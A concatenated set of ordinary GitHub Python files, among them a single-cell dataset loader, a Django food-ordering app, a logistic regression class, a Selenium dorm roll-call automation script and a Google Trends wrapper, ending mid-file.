'auditrisk.processed.test', \n\t \t'results_filename' : 'kevin.NNAudit.{0}.{1}.results'.format( str(AUDIT_LRATE).split('.')[1], AUDIT_NEPOCH ) \n\t\t}\n\t}\n}","repo_name":"keyao21/AI_Projects","sub_path":"NeuralNet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33068553891","text":"import logging\nimport os\nimport shutil\nimport tarfile\nimport warnings\n\nimport numpy as np\n\nfrom scvi import settings\nfrom scvi.data._download import _download\n\nlogger = logging.getLogger(__name__)\n\navailable_datasets = {\n \"1.1.0\": [\n \"frozen_pbmc_donor_a\",\n \"frozen_pbmc_donor_b\",\n \"frozen_pbmc_donor_c\",\n \"fresh_68k_pbmc_donor_a\",\n \"cd14_monocytes\",\n \"b_cells\",\n \"cd34\",\n \"cd56_nk\",\n \"cd4_t_helper\",\n \"regulatory_t\",\n \"naive_t\",\n \"memory_t\",\n \"cytotoxic_t\",\n \"naive_cytotoxic\",\n ],\n \"1.3.0\": [\"1M_neurons\"],\n \"2.1.0\": [\"pbmc8k\", \"pbmc4k\", \"t_3k\", \"t_4k\", \"neuron_9k\"],\n \"3.0.0\": [\n \"pbmc_1k_protein_v3\",\n \"pbmc_10k_protein_v3\",\n \"malt_10k_protein_v3\",\n \"pbmc_1k_v2\",\n \"pbmc_1k_v3\",\n \"pbmc_10k_v3\",\n \"hgmm_1k_v2\",\n \"hgmm_1k_v3\",\n \"hgmm_5k_v3\",\n \"hgmm_10k_v3\",\n \"neuron_1k_v2\",\n \"neuron_1k_v3\",\n \"neuron_10k_v3\",\n \"heart_1k_v2\",\n \"heart_1k_v3\",\n \"heart_10k_v3\",\n ],\n \"3.1.0\": [\"5k_pbmc_protein_v3\", \"5k_pbmc_protein_v3_nextgem\"],\n}\n\ndataset_to_group = {\n dataset_name: group\n for group, list_datasets in available_datasets.items()\n for dataset_name in list_datasets\n}\n\ngroup_to_url_skeleton = {\n \"1.1.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_gene_bc_matrices.tar.gz\",\n \"1.3.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_gene_bc_matrices_h5.h5\",\n \"2.1.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_gene_bc_matrices.tar.gz\",\n \"3.0.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_feature_bc_matrix.h5\",\n \"3.1.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_feature_bc_matrix.h5\",\n}\n\ngroup_to_filename_skeleton = {\n \"1.1.0\": \"{}_gene_bc_matrices.tar.gz\",\n \"1.3.0\": \"{}_gene_bc_matrices_h5.h5\",\n \"2.1.0\": \"{}_gene_bc_matrices.tar.gz\",\n \"3.0.0\": \"{}_feature_bc_matrix.h5\",\n \"3.1.0\": \"{}_feature_bc_matrix.h5\",\n}\n\n\ndef _load_dataset_10x(\n dataset_name: str = None,\n filename: str = None,\n save_path: str = \"data/10X\",\n url: str = None,\n return_filtered: bool = True,\n remove_extracted_data: bool = False,\n **scanpy_read_10x_kwargs,\n):\n try:\n import scanpy\n except ImportError as err:\n raise ImportError(\"Please install scanpy -- `pip install scanpy`\") from err\n\n # form data url and filename unless manual override\n if dataset_name is not None:\n if url is not None:\n warnings.warn(\n \"dataset_name provided, manual url is disregarded.\",\n UserWarning,\n stacklevel=settings.warnings_stacklevel,\n )\n if filename is not None:\n warnings.warn(\n \"dataset_name provided, manual filename is disregarded.\",\n UserWarning,\n stacklevel=settings.warnings_stacklevel,\n )\n group = dataset_to_group[dataset_name]\n url_skeleton = group_to_url_skeleton[group]\n\n filter_type = \"filtered\" if return_filtered else \"raw\"\n url = url_skeleton.format(group, dataset_name, dataset_name, filter_type)\n filename_skeleton = group_to_filename_skeleton[group]\n filename = filename_skeleton.format(filter_type)\n save_path = os.path.join(save_path, dataset_name)\n elif filename is not None and url is not None:\n logger.info(\"Loading 10X dataset with custom url and filename\")\n elif filename is not None and url is None:\n logger.info(\"Loading local 10X dataset with custom filename\")\n else:\n logger.info(\"Loading extracted local 10X dataset with custom filename\")\n _download(url, save_path=save_path, filename=filename)\n file_path = os.path.join(save_path, filename)\n\n # untar\n download_is_targz = url[-7:] == \".tar.gz\"\n was_extracted = False\n if download_is_targz is True:\n if not os.path.exists(file_path[:-7]): # nothing extracted yet\n if tarfile.is_tarfile(file_path):\n logger.info(\"Extracting tar file\")\n tar = tarfile.open(file_path, \"r:gz\")\n tar.extractall(path=save_path)\n was_extracted = True\n tar.close()\n path_to_data_folder, suffix = _find_path_to_mtx(save_path)\n adata = scanpy.read_10x_mtx(path_to_data_folder, **scanpy_read_10x_kwargs)\n if was_extracted and remove_extracted_data:\n folders_in_save_path = path_to_data_folder[len(save_path) + 1 :].split(\"/\")\n extracted_folder_path = save_path + \"/\" + folders_in_save_path[0]\n logger.info(f\"Removing extracted data at {extracted_folder_path}\")\n shutil.rmtree(extracted_folder_path)\n else:\n adata = scanpy.read_10x_h5(file_path, **scanpy_read_10x_kwargs)\n\n adata.var_names_make_unique()\n scanpy.pp.filter_cells(adata, min_counts=1)\n scanpy.pp.filter_genes(adata, min_counts=1)\n\n return adata\n\n\ndef _find_path_to_mtx(save_path: str) -> tuple[str, str]:\n \"\"\"Returns exact path for the data in the archive.\n\n This is required because 10X doesn't have a consistent way of storing their data.\n Additionally, the function returns whether the data is stored in compressed format.\n\n Returns\n -------\n path in which files are contains and their suffix if compressed.\n\n \"\"\"\n for root, _, files in os.walk(save_path):\n # do not consider hidden files\n files = [f for f in files if not f[0] == \".\"]\n contains_mat = [\n filename == \"matrix.mtx\" or filename == \"matrix.mtx.gz\" for filename in files\n ]\n contains_mat = np.asarray(contains_mat).any()\n if contains_mat:\n is_tar = files[0][-3:] == \".gz\"\n suffix = \".gz\" if is_tar else \"\"\n return root, suffix\n raise FileNotFoundError(\"No matrix.mtx(.gz) found in path (%s).\" % save_path)\n","repo_name":"scverse/scvi-tools","sub_path":"scvi/data/_built_in_data/_dataset_10x.py","file_name":"_dataset_10x.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":1037,"dataset":"github-code","pt":"72"} +{"seq_id":"15139111999","text":"#!/usr/bin/env python3\nimport sys\n\nYES = \"Yes\" # type: str\nNO = \"No\" # type: str\n\n\ndef gcd(a, b):\n if b>a:\n a, b = b, a\n while b>0:\n a, b = b, a%b\n return a\n\ndef solve(T: int, A: \"List[int]\", B: \"List[int]\", C: \"List[int]\", D: \"List[int]\"):\n for i in range(T):\n a, b, c, d = A[i], B[i], C[i], D[i]\n if ad:\n print('No')\n continue\n x = (c-a+1)%b\n g = gcd(b, d)\n print('No' if -(-x//g*g) - x + c+1 < b else 'Yes')\n\n\n return\n\n\n# Generated by 1.1.3 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n T = int(next(tokens)) # type: int\n A = [int()] * (T) # type: \"List[int]\" \n B = [int()] * (T) # type: \"List[int]\" \n C = [int()] * (T) # type: \"List[int]\" \n D = [int()] * (T) # type: \"List[int]\" \n for i in range(T):\n A[i] = int(next(tokens))\n B[i] = int(next(tokens))\n C[i] = int(next(tokens))\n D[i] = int(next(tokens))\n solve(T, A, B, C, D)\n\nif __name__ == '__main__':\n main()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc026/B/4592388.py","file_name":"4592388.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"72696943914","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom store.models import *\nimport datetime\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\ndef index(request):\n context={}\n return render(request, 'store/index.html', context)\n\ndef placeView(request):\n context={\n 'place': Restaurant.objects.order_by('place').values('place').distinct()\n }\n \n \n\n return render(request, 'store/cities_view.html', context)\n\ndef restaurants_view(request,qcity):\n \n context={\n 'restaurants': Restaurant.objects.filter(place=qcity)\n }\n return render(request, 'store/restaurants_list.html', context)\n\ndef restaurant_foods(request,rt):\n tmp=Restaurant.objects.get(pk=rt)\n FoodOrder.objects.all().delete()\n food_categories=Food.objects.filter(restaurant=tmp).order_by('category').values('category').distinct()\n fcat_list=[]\n for fcat in food_categories:\n fcat_list.append(fcat['category'])\n \n\n context={\n 'rid':rt,\n 'restaurant_foods':Food.objects.filter(restaurant=tmp).order_by('-sale'),\n 'fcat_list':fcat_list,\n 'rating':Restaurant.objects.get(pk=rt).rating,\n 'descrpn':Restaurant.objects.get(pk=rt).description,\n 'rname':Restaurant.objects.get(pk=rt).name,\n 'ratingint':int(Restaurant.objects.get(pk=rt).rating),\n 'rem':int(5)-int(Restaurant.objects.get(pk=rt).rating)\n }\n return render(request, 'store/restaurant_foods.html', context)\n\ndef profileView(request):\n context = {'user': request.user}\n return render(request, 'store/profile.html', context)\n\ndef login(request):\n return HttpResponse(\"\")\n\n@csrf_exempt\n@login_required\ndef food_cart(request):\n \n response_data={\n 'message':None,\n\n }\n food_id=request.POST['food_id']\n amt = request.POST['amt'] \n \n instnc=Food.objects.get(pk=food_id)\n try:\n tmp=FoodOrder.objects.get(food=instnc)\n \n tmp.total_amt=amt\n tmp.save() \n response_data['message']=0\n except: \n \n \n FoodOrder.objects.create(food=instnc,order_time=datetime.datetime.now(),customer=request.user,total_amt=amt) \n response_data['message']=1\n \n\n return JsonResponse(response_data)\n\n@csrf_exempt\n@login_required\ndef checkout(request):\n orders=FoodOrder.objects.all()\n net_amt=0\n order_list=[]\n try:\n for order in orders:\n nsale=order.food.sale+int(order.total_amt)\n order.food.sale=nsale\n order.food.save()\n mrpf=order.food.mrp\n new_amt=mrpf*order.total_amt\n net_amt=net_amt+new_amt\n if order.total_amt > 0:\n olap=order.food.name+str(' x ')+str(order.total_amt)+str(' = ')+str(new_amt)\n order_list.append(olap)\n\n rname=order.food.restaurant.name\n rid=order.food.restaurant.pk\n odate=order.order_time\n\n PastOrders.objects.create(foodlist=order_list,customer2=request.user,cost=net_amt,restname=rname,order_date=odate)\n context={\n 'net_amt':net_amt,\n 'order_list':order_list,\n 'rid':rid,\n } \n\n except:\n context={\n \n 'order_list':order_list,\n \n } \n return render(request, 'store/checkout.html', context) \n\n@login_required\ndef pastView(request):\n customer3=request.user\n tmp=PastOrders.objects.filter(customer2=customer3).order_by('-order_date')\n \n context={\n 'order_list':tmp,\n \n }\n\n return render(request, 'store/pastorders.html',context) \n\n@csrf_exempt\n@login_required\ndef rate_restaurant(request):\n response_data={\n 'message':None,\n\n }\n rid=request.POST['rid']\n rating=request.POST['rating']\n try:\n instnc=Restaurant.objects.get(pk=rid) \n instnc.total_rating = instnc.total_rating + int(rating) \n instnc.total_users = instnc.total_users + int(1)\n instnc.rating=instnc.total_rating/instnc.total_users\n instnc.save()\n response_data['message'] = 1\n except:\n response_data['message'] = 0\n \n\n return JsonResponse(response_data)\n\n\n@csrf_exempt\n@login_required\ndef rate(request):\n orders=FoodOrder.objects.all()\n \n\n for order in orders:\n \n rid=order.food.restaurant.pk\n \n\n \n context={\n \n 'rid':rid,\n } \n return render(request, 'store/rate.html', context) ","repo_name":"arron-tij/Tummy-Truck","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25476451217","text":"import numpy as np\nimport math\n\nclass LG:\n def __init__(self,dataIn,dataOut): #constructor\n self.dataIn=dataIn\n self.dataOut=dataOut\n self.normalized_dataIn=self.normalizeDataIn()[0]\n def normalizeDataIn(self):\n list_means=[]\n noAttributes=len(self.dataIn[0])\n n=len(self.dataOut)\n for i in range(noAttributes):\n sum=0\n for el in self.dataIn:\n sum=sum+el[i]\n list_means.append(sum/n)\n list_deviation = []\n for i in range(noAttributes):\n sum=0\n for el in self.dataIn:\n sum=sum+(el[i]-list_means[i])**2\n list_deviation.append(math.sqrt(sum/(n-1)))\n normalized_dataIn=[]\n for i in range(n):\n li=[]\n for j in range(len(self.dataIn[i])):\n li.append((self.dataIn[i][j]-list_means[j])/list_deviation[j])\n normalized_dataIn.append(li)\n #denormalization\n #a=normalized_dataIn[0][0]\n #print(a*list_deviation[0]+list_means[0])\n #print(\"normaized data\",normalized_dataIn)\n return [normalized_dataIn,list_means,list_deviation]\n def normalize_oneData(self,data):\n l=self.normalizeDataIn()\n for i in range(len(data[0])):\n data[0][i]=(data[0][i]-l[1][i])/l[2][i]\n return data\n def constructInputMatrix(self): #data initialy given as bidimensional list\n input=self.normalized_dataIn\n Matrix=np.array(input)\n #print(\"matrix\",Matrix)\n return Matrix\n def constructOutMatrix(self):\n l=[]\n for el in self.dataOut:\n l.append([el])\n l=np.array(l)\n return l\n def constructCoeffMatrix(self): #we have 7 features for each data row so we have to initialize 7+1(free) coefficient which will later be learnt\n m=len(self.dataIn[0])\n l=np.random.rand(m,1)\n l=np.array(l)\n coef=[[0.5] for i in range(m)]\n coef=np.array(coef)\n return coef\n\n def sigmoidFunction(self,z):\n return 1.0 / (1.0 + math.exp(0.0 - z))\n def gradientDescent(self,x, y, theta, alpha, num_iters): #BGD\n \"\"\"\n Performs gradient descent to learn theta\n \"\"\"\n myfunc_vec = np.vectorize(self.sigmoidFunction)\n m = y.size # number of training examples\n for i in range(num_iters):\n y_hat = myfunc_vec(np.dot(x, theta))\n theta = theta - alpha * np.dot(x.T, y_hat - y)\n return theta\n def prediction(self,example, coef):\n s = 0.0\n for i in range(0, len(example)):\n s += coef[i] * example[i]\n return s\n def train(self):\n maxiter=100\n input=self.constructInputMatrix()\n out=self.constructOutMatrix()\n coef=self.constructCoeffMatrix()\n learning_rate=0.001\n return self.gradientDescent(input,out,coef,learning_rate,maxiter)\n def model(self,input):\n a=self.train()\n input=self.normalize_oneData(input)\n res = self.sigmoidFunction(self.prediction(input[0], a))\n cut_point=0.5\n print(\"The probability is:\",res)\n if(res>=cut_point):\n return 1\n return 0\n","repo_name":"TidorP/DiagnosticPrediction","sub_path":"Diagnostic/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29694562120","text":"import smtplib\nimport email.message\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport chromedriver_autoinstaller\nimport schedule\n\n\n_acc = str(input('請輸入學號:'))\n_pwd = str(input('請輸入校務系統密碼:'))\n_email = str(input('請輸入email:'))\n\ndef job():\n chromedriver_autoinstaller.install()\n print('自動點名系統啟動中')\n\n chrome_options = Options()\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-dev-shm-usage')\n driver = webdriver.Chrome(options=chrome_options)\n driver.implicitly_wait(10)\n\n driver.get('http://db.kh.usc.edu.tw/dormRollCall/login.php')\n driver.find_element('xpath','/html/body/form/center/table/tbody/tr[1]/td[2]/input').send_keys(_acc)# enter acc\n driver.find_element('xpath','/html/body/form/center/table/tbody/tr[2]/td[2]/input').send_keys(_pwd)# enter pwd\n driver.find_element('xpath','/html/body/form/center/table/tbody/tr[3]/td/input').click()# click login\n driver.find_element('xpath','/html/body/form/input[2]').click()# roll call\n alert = driver.switch_to.alert\n alert_text = alert.text\n alert.accept()\n\n if '非校內宿舍IP' in alert_text:\n print('點名失敗,請連接宿舍網路')\n\n msg=email.message.EmailMessage()\n\n msg['From']='lamerk0218@gmail.com'\n msg['To']=_email\n msg['Subject']='點名失敗,請手動點名'\n\n msg.add_alternative('

點名失敗,請手動點名

', subtype='html')\n\n server=smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login('lamerk0218', 'PWD_HERE')\n server.send_message(msg)\n server.close()\n\n else:\n print('點名成功')\n\n driver.close()\n\nschedule.every().day.at('21:35').do(job)\n\nwhile True:\n schedule.run_pending()","repo_name":"Xeift/khusc-dorm-roll-call","sub_path":"auto_check.py","file_name":"auto_check.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16050841768","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Manually added\n# %%06e04634dc02a21685ae0bf1dca0dadbeff3eb0758082e61fcd2304ae19ba69e7afda013125c5f1d3138487a150f61a0118734169f4c28e12ecbf82c7b0f3873%%\n#\n# PySyE project: new.py - script for generation of python modules and scripts.\n#\n# the best way to integrate this code to the system is to add source directory to the\n# PATH environment variable.\n\nSCRIPT_DEBUG_MODE = False\n\n#\n# Standard modules imports\n#\nimport sys\nimport os\nimport platform\nimport argparse\nimport inspect\n\n\n#\n# Custom modules imports\n#\nfrom hashing import do_hash\nimport scripts_commons\nfrom scripts_commons import get_conf, DEFAULT_LOCATOR_SOURCE, DEFAULT_ENC, check_os, main, writable\nfrom templating import TemplateManager\n\nNEW_CONF = '.new_conf'\n\n \ndef execute(script_name, script_dir, cur_dir, paths):\n \"\"\"\n usage: new.py filename [-t app|script|module] [-l locator]\n \n -t and -l autowired from .new_conf\n \"\"\"\n \n temp_manager = TemplateManager()\n elements = {}\n \n conf = os.path.join(script_dir, NEW_CONF)\n \n if os.path.isfile(conf):\n elements = get_conf(conf)\n \n if len(sys.argv) < 2:\n print(\"{0:s}: No arguments specified\".format(script_name))\n exit(0)\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"destination\", \n help=\"Python file path\", \n type=str)\n parser.add_argument(\"-t\", \"--type\", \n help=\"Type of python file\", \n choices=temp_manager.choices())\n parser.add_argument(\"-l\", \"--locator\", \n help=\"Common identifier\", \n type=str)\n args = parser.parse_args()\n \n if 'template' in elements or args.type:\n if args.type:\n selected_template = args.type\n else:\n selected_template = elements['template']\n else:\n selected_template = temp_manager.APP\n \n if 'locator' in elements or args.locator:\n if args.locator:\n locator_source = bytes(args.locator, DEFAULT_ENC)\n else:\n locator_source = bytes(elements['locator'], DEFAULT_ENC)\n else:\n locator_source = DEFAULT_LOCATOR_SOURCE\n \n filepath = args.destination\n\n print(\"Creating {0:s} as python main...\".format(filepath), end=\"\")\n\n if not writable(filepath):\n print(\"Writing {0:s} aborted.\".format(filepath))\n exit(0)\n \n template_path = temp_manager.get_path(selected_template)\n\n with open(os.path.join(script_dir, template_path), \"r\") as fr:\n with open(filepath, \"w\") as fw:\n \n if selected_template == temp_manager.MODULE:\n get_conf_func = \"\".join(inspect.getsourcelines(get_conf)[0])\n module_name = os.path.splitext(os.path.basename(filepath))[0]\n fw.write(fr.read().format(do_hash(locator_source), get_conf_func,\n module_name.upper(), module_name,\n module_name.upper(), module_name.upper()))\n else:\n fw.write(fr.read().format(do_hash(locator_source)))\n \n if selected_template == temp_manager.MODULE:\n os.chmod(filepath, scripts_commons.FileUtils().get_644())\n else:\n os.chmod(filepath, scripts_commons.FileUtils().get_755())\n \n \n print(\"Done\")\n\n\nif __name__ == '__main__':\n\n main(execute, SCRIPT_DEBUG_MODE)\n","repo_name":"lmlwci0m/PySyE","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26647752447","text":"#!/usr/bin/python3\n\nimport socket\nimport sys\nimport time\nimport os.path\nimport json\nimport threading\n\n\nclass Collector(object):\n def __init__(self, serverIp, serverPort, targetDir, intervalSecs):\n self.serverIp = serverIp\n self.serverPort = serverPort\n self.targetDir = targetDir\n self.filenamePrefix = targetDir.split(\"/\")[-1]\n self.intervalSecs = intervalSecs\n\n def request(self, ip, port):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.connect((ip, port))\n sock.sendall(bytes(\"read\", 'ascii'))\n response = str(sock.recv(1024), 'ascii')\n print(\"Received: {}\".format(response))\n return response\n\n def collect(self):\n threading.Timer(self.intervalSecs, self.collect).start()\n decoder = json.JSONDecoder()\n response = decoder.decode(self.request(self.serverIp, self.serverPort))\n responseKeys = list(response.keys())\n responseKeys.sort()\n filename = os.path.join(self.targetDir, \"%s-%s.csv\" % (self.filenamePrefix, time.strftime(\"%Y%m%d\")))\n if os.path.exists(filename):\n f = open(filename, \"a\")\n else:\n f = open(filename, \"w\")\n f.write(\"time;%s\\n\" % \";\".join(k for k in responseKeys))\n f.write(\"%s;\" % time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n f.write(\"%s\\n\" % \";\".join(\"%0.2f\" % response[k] for k in responseKeys))\n f.close()\n\n def run(self):\n self.collect()\n\n\nif __name__==\"__main__\":\n if len(sys.argv) != 4:\n sys.stderr.write(\"usage: %s \\n\" % sys.argv[0])\n sys.stderr.write(\" ex: %s 192.168.193.2:9992 /home/pi/offgridtec 60\\n\" % sys.argv[0])\n sys.exit(-1)\n serverIp = sys.argv[1].split(\":\")[0]\n serverPort = int(sys.argv[1].split(\":\")[1])\n targetDir = sys.argv[2]\n intervalSecs = int(sys.argv[3])\n collector = Collector(serverIp, serverPort, targetDir, intervalSecs)\n collector.run()\n","repo_name":"bgoedel/offgridtec","sub_path":"solar-collector.py","file_name":"solar-collector.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2810304088","text":"import discord\r\nfrom discord.ext import commands,tasks\r\nfrom pytube import YouTube\r\nimport random\r\nimport requests\r\nimport json\r\nimport asyncio\r\nimport itertools\r\nimport googlesearch as gs\r\n\r\n\r\nasync def music_commands(ctx):\r\n await ctx.send(ctx.author.mention+\" all the music commands are only for educational purposes\")\r\n await ctx.send(\"Music commands are AGAINST YOUTUBE POLICIES, hence restricted :negative_squared_cross_mark: \")\r\n return False\r\n\r\nclass Music(commands.Cog):\r\n def __init__(self,bot):\r\n self.bot=bot\r\n\r\n ## MUSIC COMMANDS\r\n ## AGAINST YOUTUBE POLICIES\r\n ## ONLY FOR EDUCATIONAL PURPOSES\r\n ## Youtube doesnot allow downloading its videos\r\n ## DOESNOT work from heroku server as the download doesnot take place\r\n ## ONLY FUNCTIONAL FROM PERSONAL COMPUTER (as of i know)\r\n \r\n @commands.check(music_commands)\r\n @commands.command(aliases=[\"p\"])\r\n async def play(self,ctx,*,query):\r\n try:\r\n voiceChannel = discord.utils.get(ctx.guild.voice_channels, name=str(ctx.message.author.voice.channel))\r\n await voiceChannel.connect()\r\n await ctx.send(\"Joined \"+str(ctx.message.author.voice.channel)+\" voice channel!:white_check_mark:\")\r\n except AttributeError:\r\n await ctx.send(ctx.message.author.mention+\" is not in any voice channel :negative_squared_cross_mark:\")\r\n return\r\n except Exception as e:\r\n print(e)\r\n \r\n url=None\r\n if len(query)==0:\r\n await ctx.send(ctx.message.author.mention+\"you need to provide a youtube video link or any query with the play command :negative_squared_cross_mark:\")\r\n return\r\n elif query.startswith(\"https://www.youtube.com/watch?v=\"):\r\n url=query\r\n else:\r\n s=gs.search(\"https://www.youtube.com/results?search_query=\"+query.replace(\" \",\"+\"),\"com\",\"en\",num=10,stop=10,pause=2.0)\r\n for i in s:\r\n if i.startswith(\"https://www.youtube.com/watch?v=\"):\r\n url=i\r\n break\r\n if url==None:\r\n await ctx.send(ctx.message.author.mention+\" some error is caused :negative_squared_cross_mark:\")\r\n return\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n yt=YouTube(str(url))\r\n yt_embed=discord.Embed(title=yt.title+\":musical_note:\",description=yt.description,color=discord.Colour.red())\r\n yt_embed.set_thumbnail(url=yt.thumbnail_url)\r\n yt_embed.add_field(name=\"Author: \",value=yt.author+\":musical_score: \",inline=False)\r\n yt_embed.add_field(name=\"Duration: \",value=str(yt.length)+\" seconds :clock3: \",inline=False)\r\n yt_embed.add_field(name=\"Publish date: \",value=str(yt.publish_date)+\":calendar_spiral:\",inline=False)\r\n yt_embed.add_field(name=\"Rating: \",value=str(yt.rating)+\":star2:\",inline=False)\r\n yt_embed.add_field(name=\"Views: \",value=str(yt.views)+\":eyes:\",inline=False)\r\n t=yt.streams.filter(only_audio=True)\r\n t[0].download(\".\\songs\")\r\n try:\r\n print(\".\\songs\\\\\"+yt.title+\".mp4\")\r\n voice.play(discord.FFmpegPCMAudio(\".\\songs\\\\\"+yt.title+\".mp4\"))\r\n await ctx.send(\"Playing \"+yt.title+\" :loud_sound:\")\r\n await ctx.send(embed=yt_embed)\r\n except Exception as e:\r\n print(e)\r\n await ctx.send(ctx.message.author.mention+\" joker already playing audio :negative_squared_cross_mark:\")\r\n await ctx.send(\"Use stop command to stop the currently playing song and leave command to make joker exit the current voice channel\")\r\n return\r\n\r\n @commands.check(music_commands) \r\n @commands.command(aliases=[\"disconnect\",\"exit\"])\r\n async def leave(self,ctx):\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n if voice.is_connected():\r\n await voice.disconnect()\r\n await ctx.send(\"Disconnected :wave:\")\r\n else:\r\n await ctx.send(\"The bot is not connected to a voice channel. :negative_squared_cross_mark:\")\r\n\r\n @commands.check(music_commands)\r\n @commands.command()\r\n async def pause(self,ctx):\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n if voice.is_playing():\r\n voice.pause()\r\n await ctx.send(\"Paused :pause_button:\")\r\n else:\r\n await ctx.send(\"Currently no audio is playing. :negative_squared_cross_mark:\")\r\n\r\n @commands.check(music_commands)\r\n @commands.command()\r\n async def resume(self,ctx):\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n if voice.is_paused():\r\n voice.resume()\r\n await ctx.send(\"Resumed :play_pause: \")\r\n else:\r\n await ctx.send(\"The audio is not paused. :negative_squared_cross_mark:\")\r\n\r\n @commands.check(music_commands)\r\n @commands.command()\r\n async def stop(self,ctx):\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n voice.stop()\r\n await ctx.send(\"Stopped playing :octagonal_sign: \")\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Music(bot))\r\n","repo_name":"Mastermind-sap/joker","sub_path":"cogs/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"29871701399","text":"from django.shortcuts import render \nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.db.models import Count\nfrom polls.models import Poll\n\n@login_required()\ndef polls_list(request):\n all_polls = Poll.objects.all()\n search_term = ''\n if 'name' in request.GET:\n all_polls = all_polls.order_by('text')\n\n if 'date' in request.GET:\n all_polls = all_polls.order_by('pub_date')\n\n if 'vote' in request.GET:\n all_polls = all_polls.annotate(Count('vote')).order_by('vote__count')\n\n if 'search' in request.GET:\n search_term = request.GET['search']\n all_polls = all_polls.filter(text__icontains=search_term)\n\n paginator = Paginator(all_polls, 6) # Show 6 contacts per page\n page = request.GET.get('page')\n polls = paginator.get_page(page)\n\n get_dict_copy = request.GET.copy()\n params = get_dict_copy.pop('page', True) and get_dict_copy.urlencode()\n\n context = {\n 'polls': polls,\n 'params': params,\n 'search_term': search_term,\n }\n return render(request, 'polls/polls_list.html', context)\n\n@login_required()\ndef list_by_user(request):\n all_polls = Poll.objects.filter(owner=request.user)\n paginator = Paginator(all_polls, 7) # Show 7 contacts per page\n\n page = request.GET.get('page')\n polls = paginator.get_page(page)\n\n context = {\n 'polls': polls,\n }\n return render(request, 'polls/polls_list.html', context)\n\n","repo_name":"Alyzbane/AnalysenKompass","sub_path":"pev/polls/views/poll/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"249921643","text":"\"\"\"\nTODO: falta agregar opcion para salvar la info\n\"\"\"\nimport pandas as pd\nimport numpy as np\nfrom pytrends.request import TrendReq\nfrom datetime import datetime\nimport json\n\nclass trends:\n def __init__(self,brand,start,end,agg_locs,loc_dict):\n self.brand=brand\n # self.trends = TrendReq(hl=\"MX\", tz=360,timeout=(10,25),retries=10, backoff_factor=0.1)\n self.start=start\n self.end=end\n # self.data=pd.DataFrame()\n self.agg_locs=agg_locs\n self.data = {}\n self.dict = loc_dict\n\n def save(self,output_path):\n with open(str(output_path),\"w\") as fp:\n json.dump(self.data,fp,indent=4)\n \n def search(self):\n if type(self.agg_locs) != list:\n self.agg_locs=[self.agg_locs]\n for loc in self.agg_locs:\n print(loc)\n print(self.get_geo_code(self.dict,str(loc)))\n trends = TrendReq(hl=\"es-MX\", tz=360,timeout=(10,25),retries=10, backoff_factor=0.1)\n trends.build_payload(kw_list=[self.brand],\n cat=0,\n timeframe=\"{} {}\".format(self.start,self.end),\n geo=str(self.get_geo_code(self.dict,str(loc))))\n print(loc)\n self.data[str(loc)] = json.loads(trends.interest_over_time().drop(labels=['isPartial'],axis='columns').to_json(indent=4, orient=\"index\"))\n\n def get_geo_code(self, dict,loc):\n return dict[str(loc)]\n \n def get_data(self):\n return self.data\n\nimport yaml\nwith open(\"MASTERFILE/config.yml\") as f:\n config = yaml.safe_load(f)\n\n\n\ntrends_tiempo = trends(\"BBVA\")\n\nclass pytrendReg_tiempo:\n def __init__(self,brand_):\n self.brand = brand_\n # self.trends = TrendReq(hl=\"MX\", 